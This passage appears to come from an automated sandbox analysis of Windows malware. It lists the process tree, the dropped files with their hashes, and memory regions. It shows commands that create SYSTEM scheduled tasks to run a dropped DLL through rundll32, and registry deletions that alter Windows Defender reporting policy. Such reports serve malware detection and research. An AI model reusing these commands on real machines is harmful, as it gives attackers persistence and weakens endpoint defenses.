C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "xhAFLspUEGhlntx"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xhAFLspUEGhlntx"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TGleSCHdxQCUEC" /F /xml "C:\Program Files (x86)\OKneYAAzclQU2\ndkbdHX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iixDycgqswbNt2" /F /xml "C:\ProgramData\WoychCUlhHkYXpVB\zVFwamI.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PdJioIBoJxlJjfqRR2" /F /xml "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR\OLLJurn.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uIlXdWmTwvbWFvFElbK2" /F /xml "C:\Program Files (x86)\eCbNXTSQanJlC\ALaeKdf.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jwkhvtMiulvJCTqog" /SC once /ST 10:24:52 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UIFvrSrxAzeYKEuX\XnZhWSGt\MuhyaAK.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jwkhvtMiulvJCTqog"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tRsUEOedRvIwZoOQu"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UIFvrSrxAzeYKEuX\XnZhWSGt\MuhyaAK.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UIFvrSrxAzeYKEuX\XnZhWSGt\MuhyaAK.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jwkhvtMiulvJCTqog"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\OKneYAAzclQU2\ndkbdHX.xmlFilesize
2KB
MD5b7843e0117fef719514971964d15fb40
SHA19fe944eb517c750564fab93e50e2b126c516ec75
SHA256802259626442ff1b30dbb2b8d9c46c4107a2764ba4a63f55548b2d127e4b7d0c
SHA512346caab578a07ea41ac577b2aa2ca3bb6231e0ed1559ccf264cc5344c91a856ec2880b955455d51b5f487251190fd2df08ad00641b797235c8fd532e3ebaced8
-
C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR\OLLJurn.xmlFilesize
2KB
MD59fdcc07c8d164231f82ae0d63c33f973
SHA19211e3ec088eff91002eb3e95bbb9225910bad50
SHA256eb11a7d67db0ef2cce3e0dcefb92116ec7b6ee99ffe3a1a02612ce215c68d092
SHA512f9748ba0809d7d019adbba3cd8d2ed664fa8d44b670fc86151fa43977c9603f9e93f28f345779153eceba8a91ed02037130253a198daaafc56c5246eab6ed635
-
C:\Program Files (x86)\eCbNXTSQanJlC\ALaeKdf.xmlFilesize
2KB
MD51b2f67d362eb4b7aa50e9ba13f227e87
SHA1d985803e752de656a65ad0575fc244cbd1d75e2a
SHA256d03e5b952f56eb73c5f908b9a34e3d259da20555d1275e03b1e45b76d077cc41
SHA51212170bd2d27f9c0fe0f1a3a1f524af8d851a5e5dc0b7223ddbf5761c9705b0f09e1f52d3622be21394090017458d7b922ab1c59cca896fcba749109e43c161b2
-
C:\Program Files (x86)\wRLQelouU\aZWxSYx.xmlFilesize
2KB
MD59618d57a9ea514661f57e1ac727def3d
SHA16325a72ea8bf940572e7f50f1c32bcba18720f19
SHA2564906b6b50fb6e3d166c32ef106bda25363f367739b7085170f5c806841890661
SHA512826360046664a40edfcf6888986fecbdc690bbe9a31f74435dedaa6d23520ca13f8a55f06567db5ae798dca4dac0ed052fbc87c07efac18b19cf29fbc8c616b4
-
C:\ProgramData\WoychCUlhHkYXpVB\zVFwamI.xmlFilesize
2KB
MD53726d09f15ec6720a8b67e536eacba45
SHA122d71c3b2214ec14a9f29d721654ab10138afaf6
SHA2569fdfe42a6a5bc6e03f8d34fc08c0aec556d33af70baf65de42ad84d74b6f6924
SHA512f1b2f67f96a23447c41dcf8babe42f0ba9461cb17a0ba4a1f1b3d5bce19a17773b0761a3c6256546201818f53442360c7d00d0406b0a26ef1b0d768945b32c7d
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
C:\Users\Admin\AppData\Local\Temp\7zS6CE8.tmp\Install.exeFilesize
6.3MB
MD55445f884c7d981b120692e51709f7298
SHA1867de2fc5c9ed08dd15d384ab26c23f9c8032a60
SHA256dfdb13191009faf502960b89645e465c29254fb90495a1d73ae06eb4ebae1475
SHA51212d3d8a35efe557a6a3e9794f30f079b1cb22666036d50e5636cf725a6f59d729258f167e1005d0a9aa20aeeb92f3ab2ee5479c061f818378f1e735846d716fc
-
C:\Users\Admin\AppData\Local\Temp\7zS6CE8.tmp\Install.exeFilesize
6.3MB
MD55445f884c7d981b120692e51709f7298
SHA1867de2fc5c9ed08dd15d384ab26c23f9c8032a60
SHA256dfdb13191009faf502960b89645e465c29254fb90495a1d73ae06eb4ebae1475
SHA51212d3d8a35efe557a6a3e9794f30f079b1cb22666036d50e5636cf725a6f59d729258f167e1005d0a9aa20aeeb92f3ab2ee5479c061f818378f1e735846d716fc
-
C:\Users\Admin\AppData\Local\Temp\7zS6FD6.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Users\Admin\AppData\Local\Temp\7zS6FD6.tmp\Install.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\bxOsRQN.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\bxOsRQN.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD52e6a9e0dd1f8f7d0416deb86d810c017
SHA17d16f49afe78130b9ed930566fa54fc2aaa9d941
SHA25653cf98e40ccbbe744e3d047c80d6ac6dad920d0a8d324d8d065c829bdd258e1f
SHA512c112cb74979c3ccfd879164b737b7d5370480617d55683ddf496cab3380b1019451a0190633d4c2fd0df4d5d5169c62ebd733d74bd61aaead05f0e28223e0fc4
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\hOSybKN.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\hOSybKN.exeFilesize
6.9MB
MD52cbf7a5984ef2b3f36e26375ed9f8d12
SHA18aac7877150b79530bd87250a67685118a66b964
SHA25606ff91645cc2c770e71f8c2fde6875296bec5ce0bceda64b34b09c2b0bed5b60
SHA512e92a3a03bbf1622f950d57665339a9d73de98817335a6d6eac160b0d9365abb99ce71ca33cc670de343b13fcc5837613832e0d5223039c904b3e18835b8bc49b
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\XnZhWSGt\MuhyaAK.dllFilesize
6.2MB
MD5630ce76ed2167a47b527cefac9f2484c
SHA154cd9466c1584d9c248dcc54700d8b6aac5a91c1
SHA2562e88294e7cfb72cafd8235df3187cdd899b69ea6ffef83f493a39a1ab11636fb
SHA512e64f4507fa2716d1f90959e0db3b4b6b24062be8bcde88fa6b057f782415250e55233b4e7129859b548e90e3bd3c3529f74aec56e6d7e61bb8d6a1bb15de9507
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\XnZhWSGt\MuhyaAK.dllFilesize
6.2MB
MD5630ce76ed2167a47b527cefac9f2484c
SHA154cd9466c1584d9c248dcc54700d8b6aac5a91c1
SHA2562e88294e7cfb72cafd8235df3187cdd899b69ea6ffef83f493a39a1ab11636fb
SHA512e64f4507fa2716d1f90959e0db3b4b6b24062be8bcde88fa6b057f782415250e55233b4e7129859b548e90e3bd3c3529f74aec56e6d7e61bb8d6a1bb15de9507
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
5KB
MD5af5a9b0cf67552db9b66a82d6d3fd4af
SHA1dd4720be6c9cdad2c1f6b4e30e71d9b0acae67e5
SHA2563645932a2885c6129467b5760fd211e021fbe3f4a9e34c620533ed54676e03ed
SHA512c9284f6cbeecd01bd53dbf75e7ebdf16b6f124e000ca6b711996c1c887c2a33596b9084e81069c4da0c0bd14ac8907024ce2c400dd973af5c9c0e95c520213bb
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
memory/228-198-0x0000000000000000-mapping.dmp
-
memory/380-143-0x0000000000000000-mapping.dmp
-
memory/388-174-0x0000000000000000-mapping.dmp
-
memory/420-171-0x0000000000000000-mapping.dmp
-
memory/596-221-0x00007FFA047C0000-0x00007FFA05281000-memory.dmpFilesize
10.8MB
-
memory/596-219-0x00007FFA047C0000-0x00007FFA05281000-memory.dmpFilesize
10.8MB
-
memory/636-199-0x0000000000000000-mapping.dmp
-
memory/664-177-0x0000000000000000-mapping.dmp
-
memory/728-250-0x0000000001F30000-0x0000000003220000-memory.dmpFilesize
18.9MB
-
memory/768-201-0x0000000000000000-mapping.dmp
-
memory/820-208-0x0000000000000000-mapping.dmp
-
memory/860-209-0x0000000000000000-mapping.dmp
-
memory/1280-200-0x0000000000000000-mapping.dmp
-
memory/1544-132-0x0000000000000000-mapping.dmp
-
memory/1556-243-0x0000000019110000-0x0000000019184000-memory.dmpFilesize
464KB
-
memory/1556-226-0x00000000166E0000-0x00000000179D0000-memory.dmpFilesize
18.9MB
-
memory/1556-229-0x00000000181E0000-0x0000000018265000-memory.dmpFilesize
532KB
-
memory/1556-247-0x0000000019300000-0x00000000193B1000-memory.dmpFilesize
708KB
-
memory/1556-233-0x00000000189F0000-0x0000000018A5C000-memory.dmpFilesize
432KB
-
memory/1720-187-0x0000000000000000-mapping.dmp
-
memory/1908-188-0x0000000000000000-mapping.dmp
-
memory/1972-148-0x0000000000000000-mapping.dmp
-
memory/1976-175-0x0000000000000000-mapping.dmp
-
memory/2388-179-0x0000000000000000-mapping.dmp
-
memory/2536-223-0x0000000000000000-mapping.dmp
-
memory/2612-141-0x0000000000000000-mapping.dmp
-
memory/2832-213-0x0000000000000000-mapping.dmp
-
memory/2872-210-0x0000000000000000-mapping.dmp
-
memory/2880-135-0x0000000000000000-mapping.dmp
-
memory/2880-138-0x0000000017610000-0x0000000018900000-memory.dmpFilesize
18.9MB
-
memory/3004-205-0x0000000000000000-mapping.dmp
-
memory/3132-176-0x0000000000000000-mapping.dmp
-
memory/3144-180-0x0000000000000000-mapping.dmp
-
memory/3176-193-0x0000000000000000-mapping.dmp
-
memory/3324-144-0x0000000000000000-mapping.dmp
-
memory/3352-142-0x0000000000000000-mapping.dmp
-
memory/3476-151-0x0000012083510000-0x0000012083532000-memory.dmpFilesize
136KB
-
memory/3476-154-0x00007FFA05DD0000-0x00007FFA06891000-memory.dmpFilesize
10.8MB
-
memory/3476-153-0x00007FFA05DD0000-0x00007FFA06891000-memory.dmpFilesize
10.8MB
-
memory/3480-185-0x0000000000000000-mapping.dmp
-
memory/3640-202-0x0000000000000000-mapping.dmp
-
memory/3656-203-0x0000000000000000-mapping.dmp
-
memory/3708-211-0x0000000000000000-mapping.dmp
-
memory/3784-206-0x0000000000000000-mapping.dmp
-
memory/3820-220-0x0000000000000000-mapping.dmp
-
memory/3828-183-0x0000000000000000-mapping.dmp
-
memory/3876-207-0x0000000000000000-mapping.dmp
-
memory/3896-178-0x0000000000000000-mapping.dmp
-
memory/3940-182-0x0000000000000000-mapping.dmp
-
memory/4052-186-0x0000000000000000-mapping.dmp
-
memory/4052-149-0x0000000000000000-mapping.dmp
-
memory/4176-194-0x0000000000000000-mapping.dmp
-
memory/4220-168-0x0000000004810000-0x000000000482E000-memory.dmpFilesize
120KB
-
memory/4220-163-0x0000000000F00000-0x0000000000F36000-memory.dmpFilesize
216KB
-
memory/4220-167-0x00000000041E0000-0x0000000004246000-memory.dmpFilesize
408KB
-
memory/4220-162-0x0000000000000000-mapping.dmp
-
memory/4220-166-0x0000000003AD0000-0x0000000003B36000-memory.dmpFilesize
408KB
-
memory/4220-165-0x0000000003830000-0x0000000003852000-memory.dmpFilesize
136KB
-
memory/4220-164-0x0000000003BB0000-0x00000000041D8000-memory.dmpFilesize
6.2MB
-
memory/4268-222-0x0000000000000000-mapping.dmp
-
memory/4324-145-0x0000000000000000-mapping.dmp
-
memory/4328-173-0x0000000000000000-mapping.dmp
-
memory/4336-184-0x0000000000000000-mapping.dmp
-
memory/4392-170-0x0000000000000000-mapping.dmp
-
memory/4512-150-0x0000000000000000-mapping.dmp
-
memory/4512-189-0x0000000000000000-mapping.dmp
-
memory/4572-146-0x0000000000000000-mapping.dmp
-
memory/4616-156-0x0000000000000000-mapping.dmp
-
memory/4628-169-0x0000000000000000-mapping.dmp
-
memory/4644-181-0x0000000000000000-mapping.dmp
-
memory/4716-155-0x0000000000000000-mapping.dmp
-
memory/4756-172-0x0000000000000000-mapping.dmp
-
memory/4756-147-0x0000000000000000-mapping.dmp
-
memory/4788-216-0x0000000000000000-mapping.dmp
-
memory/4840-191-0x0000000000000000-mapping.dmp
-
memory/4856-190-0x0000000000000000-mapping.dmp
-
memory/4892-215-0x0000000000000000-mapping.dmp
-
memory/4948-197-0x0000000000000000-mapping.dmp
-
memory/4972-159-0x00000000172D0000-0x00000000185C0000-memory.dmpFilesize
18.9MB
-
memory/5000-152-0x0000000000000000-mapping.dmp
-
memory/5056-192-0x0000000000000000-mapping.dmp
-
memory/5084-204-0x0000000000000000-mapping.dmp
-
memory/5088-212-0x0000000000000000-mapping.dmp